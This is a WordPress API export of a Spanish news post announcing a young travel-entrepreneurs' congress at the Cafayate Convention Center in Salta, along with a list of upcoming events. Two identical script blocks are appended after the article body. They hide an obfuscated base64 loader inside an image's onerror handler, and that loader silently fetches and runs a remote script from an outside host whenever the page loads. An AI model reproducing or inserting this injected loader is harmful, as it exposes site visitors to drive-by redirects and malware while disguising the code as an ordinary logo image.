{"id":4491,"date":"2024-10-14T09:49:30","date_gmt":"2024-10-14T12:49:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4491"},"modified":"2025-08-13T23:47:27","modified_gmt":"2025-08-14T02:47:27","slug":"el-primer-congreso-de-faevyt-joven-se-realizara-en-el-centro-de-convenciones-cafayate","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4491","title":{"rendered":"El primer congreso de FAEVYT Joven se realizar\u00e1 en el Centro de Convenciones Cafayate"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-fe5bca4d6227f97a7f309039ff0cac05\" style=\"background-color:#515151\"><em>La nueva sede se prepara para recibir una importante agenda de eventos en los pr\u00f3ximos meses, entre los que se destaca este espacio para la formaci\u00f3n y el crecimiento de j\u00f3venes emprendedores en el sector tur\u00edstico.<\/em><\/h4>\n\n\n\n<p>El recientemente inaugurado Centro de Convenciones Cafayate ser\u00e1 sede de importantes eventos que potenciar\u00e1n el turismo y el desarrollo econ\u00f3mico en el Valle Calchaqu\u00ed. Entre ellos, se destaca la 1\u00b0 Convenci\u00f3n de Empresarios J\u00f3venes en Turismo de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo (FAEVYT), un encuentro clave para el futuro de los j\u00f3venes emprendedores del sector tur\u00edstico, que se llevar\u00e1 a cabo los d\u00edas 29 y 30 de noviembre y contar\u00e1 con la participaci\u00f3n de 400 agencias de viajes.<\/p>\n\n\n\n<p>Este congreso, organizado por la Comisi\u00f3n de Turismo Joven de FAEVYT bajo el lema \u201cInnovaci\u00f3n y sustentabilidad para un turismo sin l\u00edmites\u201d, tiene como objetivo capacitar y formar a j\u00f3venes empresarios, brind\u00e1ndoles herramientas para su desarrollo profesional dentro del sector. Adem\u00e1s de las formaciones laborales, se enfatizar\u00e1 en tem\u00e1ticas de innovaci\u00f3n y sostenibilidad, promoviendo el liderazgo positivo entre las nuevas generaciones. Entre las actividades confirmadas, destacan charlas TED y la participaci\u00f3n de disertantes internacionales, que aportar\u00e1n su experiencia y visi\u00f3n para fomentar una industria tur\u00edstica m\u00e1s inclusiva y responsable.<\/p>\n\n\n\n<p>\u00abEste tipo de eventos no solo fortalecen el desarrollo de nuestros j\u00f3venes emprendedores, sino que tambi\u00e9n posicionan a Cafayate y al Valle Calchaqu\u00ed como un destino estrat\u00e9gico para el turismo de reuniones, generando un impacto positivo en la econom\u00eda local y en la proyecci\u00f3n internacional de la regi\u00f3n\u00bb, destac\u00f3<strong>&nbsp;Mario Pe\u00f1a<\/strong>, Ministro de Turismo y Deportes de Salta.<\/p>\n\n\n\n<p>Desde el Directorio del Centro de Convenciones Salta,&nbsp;<strong>Andrea Pieve<\/strong>&nbsp;y&nbsp;<strong>Francisco Escudero<\/strong>&nbsp;manifestaron \u201cun gran entusiasmo por el sector asociativo y privado de generar acciones en Cafayate, que como destino tur\u00edstico tiene una posici\u00f3n indiscutible a nivel nacional y cuenta con una ubicaci\u00f3n estrat\u00e9gica para la captaci\u00f3n de eventos regionales de diversas tem\u00e1ticas\u201d, agregando que \u201cesto incentiva y motiva a la comunidad local a vincularse, informarse y capacitarse en la prestaci\u00f3n de servicios para eventos, sumando esto a la calidez y hospitalidad que nos caracteriza, que los convertir\u00e1 en grandes anfitriones en la regi\u00f3n de la Ruta del Vino\u201d.<\/p>\n\n\n\n<p>El Centro de Convenciones Cafayate representa un espacio moderno y vers\u00e1til, ideal para recibir este tipo de eventos de gran relevancia. Su apertura no solo mejora la infraestructura tur\u00edstica de la regi\u00f3n, sino que tambi\u00e9n contribuye a la proyecci\u00f3n del Valle Calchaqu\u00ed como un destino de primer nivel para el turismo de reuniones.<\/p>\n\n\n\n<p><strong>Pr\u00f3ximos eventos<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>18 y 19 de octubre: X Jornadas de Actualizaci\u00f3n en Uro Oncolog\u00eda del NOA. Organizado por la Universidad Nacional de Tucum\u00e1n, Sociedad de Urolog\u00eda de Tucum\u00e1n y Sociedad Argentina de Urolog\u00eda Filial Tucum\u00e1n.<\/li>\n\n\n\n<li>30 de octubre, 1 y 2 de noviembre: Evento COPROVI \u2013 Vitivinicultura local. Incluye feria de peque\u00f1os productores, cl\u00ednicas t\u00e9cnicas y degustaci\u00f3n central de blends y cortes de los Valles.<\/li>\n\n\n\n<li>15 de noviembre: Master of Wines \u2013 Wines of Argentina\/Bodegas de Salta. Seminarios internacionales con degustaci\u00f3n.<\/li>\n\n\n\n<li>13 de diciembre: Cena anual de la C\u00e1mara de Turismo de Salta. Encuentro del sector p\u00fablico y privado de turismo.<\/li>\n\n\n\n<li>14 de diciembre: Cena de Egresados de 5to A\u00f1o. Instituci\u00f3n Educativa local.<\/li>\n<\/ul>\n\n\n\n<p>Hay m\u00e1s eventos en agenda que se encuentran prontos a confirmarse.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La nueva sede se prepara para recibir una importante agenda de eventos en los pr\u00f3ximos meses, entre los que se destaca este espacio para la formaci\u00f3n y el crecimiento de j\u00f3venes emprendedores en el sector tur\u00edstico. El recientemente inaugurado Centro de Convenciones Cafayate ser\u00e1 sede de importantes eventos que potenciar\u00e1n el turismo y el desarrollo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4492,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[8,16],"tags":[],"class_list":{"0":"post-4491","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-eventos","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4491"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4491"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4491\/revisions"}],"predecessor-version":[{"id":6665,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4491\/revisions\/6665"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4492"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4491"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4491"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4491"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}